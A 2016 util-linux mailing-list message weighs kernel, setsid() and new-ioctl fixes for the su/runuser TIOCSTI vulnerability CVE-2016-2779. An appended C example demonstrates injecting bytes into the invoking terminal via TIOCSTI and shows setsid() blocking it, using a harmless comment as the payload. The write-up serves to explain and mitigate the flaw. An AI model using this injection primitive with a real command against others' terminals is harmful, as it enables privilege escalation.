From: Stanislav Brabec <sbrabec@suse.cz>
To: up201407890@alunos.dcc.fc.up.pt
Cc: util-linux@vger.kernel.org
Subject: Re: Fixing su + runuser vulnerability CVE-2016-2779
Date: Fri, 4 Mar 2016 17:13:57 +0100
Message-ID: <56D9B445.5080808@suse.cz>
In-Reply-To: <56D8648F.60504@suse.cz>
On Mar 3, 2016 at 17:21 Stanislav Brabec wrote:
> On Mar 3, 2016 at 01:37 up201407890@alunos.dcc.fc.up.pt wrote:
>
>> On another note, grsecurity recently released a new feature named
>> GRKERNSEC_HARDEN_TTY that disallows the use of TIOCSTI to unprivileged
>> users unless the caller has CAP_SYS_ADMIN.
>
> This will fix all util-linux issues, but not chroot. There root inside
> the chroot escapes from chroot and calls commands outside.
>
We had a talk about this bug, and we found that there is no quick and
100% safe fix.
Here are possibilities:
1) Quick kernel fix disabling the TIOCSTI ioctl() for non-root if the PID
of the terminal owner is not equal to the PID of the calling process,
eventually using capabilities for the same.
Pros:
+ Fix in one place.
+ Fix all possible future abuses.
Cons:
- Many utilities are potentially affected and need testing.
- Some custom code could be affected. (I can imagine, for example, a bar
code reader running with a dedicated UID and pushing bar codes to the
terminal. Such code will break for sure.)
2) Per utility fix using setsid().
Pros:
+ Prevents the exploit without uncertain side effects.
Cons:
- Each affected utility needs fix.
- Loss of job control will affect working style of many people.
Conclusion:
We need a different solution:
3) Introduce a new terminal ioctl() or flag in the kernel. This flag will
block TIOCSTI (and possibly other dangerous actions). It will allow
implementing something like setsid(), but without the side effect of job
control loss.
Pros:
+ No unwanted side effects at all.
Cons:
- Each affected utility needs fix.
We think that only 3 will be safe and have no side effects.
Note:
Fixing the character stealing described in previous mails is not covered by
any of these solutions. This could be done safely only with a new
syscall revoke(), which has not yet been accepted into the kernel.
--
Best Regards / S pozdravem,
Stanislav Brabec
software developer
---------------------------------------------------------------------
SUSE LINUX, s. r. o.
Lihovarská 1060/12
190 00 Praha 9
Czech Republic
e-mail: sbrabec@suse.com
tel: +49 911 7405384547
fax: +420 284 084 001
http://www.suse.cz/
PGP: 830B 40D5 9E05 35D8 5E27 6FA3 717C 209F A04F CD76
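The following is an added example, not code from this thread or from util-linux. It models the mechanism behind CVE-2016-2779 and option 2 from the mail above: a child process that inherits the caller's terminal (as the target user's shell does under su or runuser) can push bytes into that terminal's input queue with TIOCSTI, and the parent's shell reads them as typed input once the child exits. Calling setsid() in the child first (the per-utility fix) makes the child give up its controlling terminal, so the kernel's TIOCSTI check, which requires the fd to be the caller's controlling tty or CAP_SYS_ADMIN, fails with EPERM. The function names tiocsti_push() and push_from_child() and the injected comment line are this example's own choices.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Push the bytes of s into the input queue of the terminal behind fd, one
 * TIOCSTI ioctl per byte. Returns the number of bytes pushed, or -1 with
 * errno set: ENOTTY if fd is not a terminal, EPERM if fd is a terminal
 * that is not the caller's controlling tty and the caller lacks
 * CAP_SYS_ADMIN. This is exactly what a malicious target user does from
 * inside "su -c" or "runuser": the bytes land in the invoking shell. */
int tiocsti_push(int fd, const char *s)
{
    int n = 0;
    for (; *s; s++, n++) {
        char c = *s;
        if (ioctl(fd, TIOCSTI, &c) < 0)
            return -1;
    }
    return n;
}

/* Run tiocsti_push() in a child process (the role of the target user's
 * command). When detach is nonzero the child first calls setsid(), the
 * mitigation of option 2: the child becomes a session leader without a
 * controlling terminal, so the inherited fd no longer passes the kernel's
 * controlling-tty check. A freshly forked child is never a process group
 * leader, so setsid() cannot fail with EPERM here. Returns the child's
 * tiocsti_push() result (byte count, or -1 on failure), encoded through
 * the exit status; -1 is also returned if fork() or waitpid() fails. */
int push_from_child(int fd, const char *s, int detach)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (detach && setsid() < 0)
            _exit(254);
        int r = tiocsti_push(fd, s);
        /* 254 = failure; otherwise the byte count (capped to fit a byte) */
        _exit(r < 0 ? 254 : (r > 253 ? 253 : r));
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    int code = WEXITSTATUS(status);
    return code == 254 ? -1 : code;
}

/* Stand-alone demo: run from an interactive shell. The injected line is a
 * shell comment, so the shell only echoes it instead of executing anything. */
int main(void)
{
    const char *payload = "# injected via TIOCSTI\n";
    if (!isatty(STDIN_FILENO)) {
        fprintf(stderr, "stdin is not a terminal; run this from a shell\n");
        return 1;
    }
    int r = push_from_child(STDIN_FILENO, payload, 0);
    printf("without setsid(): %d\n", r);          /* byte count: injection works */
    r = push_from_child(STDIN_FILENO, payload, 1);
    printf("with setsid():    %d (%s)\n", r,
           r < 0 ? "blocked, as option 2 intends" : "NOT blocked");
    return 0;
}
```

Run it from an interactive shell: the first call succeeds and the comment line appears at the prompt after the program exits, the second fails with EPERM. The trade-off the mail describes is visible here too: after setsid() the child has no controlling terminal at all, so Ctrl-C, Ctrl-Z and the rest of job control no longer reach it. On Linux 6.2 and later, the dev.tty.legacy_tiocsti sysctl (or building with CONFIG_LEGACY_TIOCSTI=n) blocks the ioctl for callers without CAP_SYS_ADMIN regardless of setsid(), which is in spirit the "fix in one place" of option 1.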
Thread overview: 19+ messages
2016-03-02 19:35 Fixing su + runuser vulnerability CVE-2016-2779 Stanislav Brabec
2016-03-02 23:39 ` Ángel González
2016-03-03 0:37 ` up201407890
2016-03-03 16:21 ` Stanislav Brabec
2016-03-04 16:13 ` Stanislav Brabec [this message]
2016-03-04 18:03 ` up201407890
2016-03-04 23:50 ` Ángel González
2016-03-08 16:33 ` Stanislav Brabec
2016-03-07 13:13 ` Karel Zak
2016-03-08 16:02 ` Stanislav Brabec
2016-09-29 14:40 ` Karel Zak
2016-10-02 13:16 ` Florian Weimer
2016-10-03 10:28 ` Karel Zak
2016-10-03 13:29 ` Karel Zak
2016-10-09 11:09 ` Florian Weimer
2016-10-03 15:04 ` Karel Zak
2016-10-03 15:48 ` Pádraig Brady
2016-10-03 16:25 ` Karel Zak
2016-10-11 14:19 ` Karel Zak